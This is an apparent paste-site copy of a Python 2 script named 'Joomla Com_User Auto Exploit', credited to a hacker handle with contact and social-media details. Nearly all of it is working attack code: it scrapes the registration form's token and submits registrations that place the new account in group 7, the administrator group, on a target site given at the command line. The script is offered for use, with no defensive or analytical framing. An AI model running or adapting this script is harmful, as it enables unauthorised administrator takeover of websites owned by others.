SHOW:
|
|
- or go back to the newest paste.
1 | Video http://www.youtube.com/watch?v=jg6_MN1wQxI&feature=youtu.be | |
2 | ||
3 | #!/usr/bin/python | |
4 | # Joomla Com_User Auto Exploit =D | |
5 | # By Xtroj-EnTn | |
6 | ||
7 | import requests as sec4ever, re, urllib, sys, os | |
8 | from threading import Thread | |
9 | from time import sleep | |
10 | def cls(): | |
11 | os.system(['clear','cls'][os.name =='nt']) | |
12 | ||
13 | cls() | |
14 | print ''' | |
15 | ||
16 | Joomla Com_User Auto Exploiter | |
17 | #Contact Me: Virus-Tn@hotmail.com | |
18 | #Greets: Zisahn Rider - Hatem Dridi | |
19 | Facebook : https://www.facebook.com/profile.php?id=100007271865841 | |
20 | #Coded By: Xtroj-EnTn''' | |
21 | ||
22 | pwd2 = 'fio3jfiej9cewc9c9w0eufew9u' | |
23 | def one(target,pwd1,pwd2,email): | |
24 | # Wrong Password | |
25 | x1 = xsec.get(target+'/index.php?option=com_users&view=registration') | |
26 | token = re.findall('type="hidden" name="(.*?)" value="1"', x1.text) | |
27 | post = {} | |
28 | post["jform[name]"] = 'Xtroj' | |
29 | post["jform[username]"] = user | |
30 | post["jform[password1]"] = pwd1 | |
31 | post["jform[password2]"] = pwd2 | |
32 | post["jform[email1]"] = email | |
33 | post["jform[email2]"] = email | |
34 | post["jform[groups][]"] = "7" | |
35 | post["option"] = "com_users" | |
36 | post["task"] = "registration.register" | |
37 | post[token[0]] = "1" | |
38 | p1 = xsec.post(target+'/index.php?option=com_users&view=registration', data=urllib.urlencode(post)) | |
39 | x2 = xsec.get(target+'/index.php/component/users/?view=registration&layout=complete') | |
40 | ||
41 | def exploit(target,pwd1,pwd2,email): | |
42 | # Wrong Password | |
43 | x3 = xsec.get(target+'/index.php?option=com_users&view=registration') | |
44 | token = re.findall('type="hidden" name="(.*?)" value="1"', x3.text) | |
45 | post = {} | |
46 | post["jform[name]"] = 'Xtroj' | |
47 | post["jform[username]"] = user | |
48 | post["jform[password1]"] = pwd1 | |
49 | post["jform[password2]"] = pwd1 | |
50 | post["jform[email1]"] = email | |
51 | post["jform[email2]"] = email | |
52 | post["jform[groups][]"] = "7" | |
53 | post["option"] = "com_users" | |
54 | post["task"] = "registration.register" | |
55 | post[token[0]] = "1" | |
56 | p2 = xsec.post(target+'/index.php?option=com_users&view=registration', data=urllib.urlencode(post)) | |
57 | x4 = xsec.get(target+'/index.php/component/users/?view=registration&layout=complete') | |
58 | ||
59 | xsec = sec4ever.session() | |
60 | if len(sys.argv) == 5: | |
61 | target = sys.argv[1] | |
62 | user = sys.argv[2] | |
63 | pwd1 = sys.argv[3] | |
64 | email = sys.argv[4] | |
65 | one(target,pwd1,pwd2,email) | |
66 | ex = exploit(target,pwd1,pwd2,email) | |
67 | print '[*] Go To Your Email & Active Then Login :D\nUsername: '+user+' & Password: '+pwd1 | |
68 | else: | |
69 | print "Usage: python tool.py http://www.victime.com/ youruser yourpass yourmail" |